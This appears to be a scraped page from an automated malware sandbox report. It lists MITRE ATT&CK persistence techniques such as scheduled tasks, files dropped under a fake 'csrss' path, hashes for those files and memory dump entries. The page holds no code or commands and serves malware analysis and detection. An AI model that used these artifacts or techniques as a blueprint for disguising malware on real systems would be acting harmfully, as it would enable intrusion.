MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.7MB

MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
C:\Windows\rss\csrss.exe
Filesize
3.8MB

MD5
0412c92d6c747349f46f50bfe3fe52b0

SHA1
eec6149ec7f28eaa2384b611480251746b80acc3

SHA256
3aa820e8487ba343e20b315b65f692e708db8ee1b144632d35e7da601c4d0e7b

SHA512
a77b1561342e2efb9b1e6ffb826c406bda0de34cd3ecae1b7593d7bb943bb1bf81bcd5e0a2a4659239e0b000e8dc67bc75fc4c6ab254821931a25ec50b7e8b18

Download Submit
C:\Windows\rss\csrss.exe
Filesize
2.9MB

MD5
bc09a4983076b2a4cfdef246fa2c4c77

SHA1
af37f3857090e9b17d2c1ed000dff38b0a9e2fb1

SHA256
fbced60a29a421e8e3222f54b0b8c29cf38ae999effd4bf97fd6e1dfa935cea7

SHA512
673de96b00d033875fbfb4fc344adbedafea69bf3ee442a1314fb23633ea72aef15499c946ff37993de8bcf06dab2738a7c416b22905f3e32bcb76ec667a0221

Download Submit
memory/844-146-0x0000000000000000-mapping.dmp

Download
memory/1772-139-0x0000000000000000-mapping.dmp

Download
memory/1776-135-0x0000000000400000-0x00000000036B8000-memory.dmp

Filesize
50.7MB

Download
memory/1776-134-0x000000000534F000-0x00000000056F6000-memory.dmp

Filesize
3.7MB

Download
memory/1776-133-0x0000000000000000-mapping.dmp

Download
memory/2028-138-0x0000000000000000-mapping.dmp

Download
memory/2564-132-0x0000000000400000-0x00000000036B8000-memory.dmp

Filesize
50.7MB

Download
memory/2564-130-0x00000000055B6000-0x000000000595D000-memory.dmp

Filesize
3.7MB

Download
memory/2564-131-0x0000000005960000-0x0000000006056000-memory.dmp

Filesize
7.0MB

Download
memory/2576-137-0x0000000000000000-mapping.dmp

Download
memory/3136-136-0x0000000000000000-mapping.dmp

Download
memory/3656-140-0x0000000000000000-mapping.dmp

Download
memory/3656-145-0x0000000000400000-0x00000000036B8000-memory.dmp

Filesize
50.7MB

Download
memory/3656-143-0x0000000005800000-0x0000000005BA7000-memory.dmp

Filesize
3.7MB

Download
memory/4360-144-0x0000000000000000-mapping.dmp

Download
memory/4376-149-0x0000000000000000-mapping.dmp

Download
memory/4388-147-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads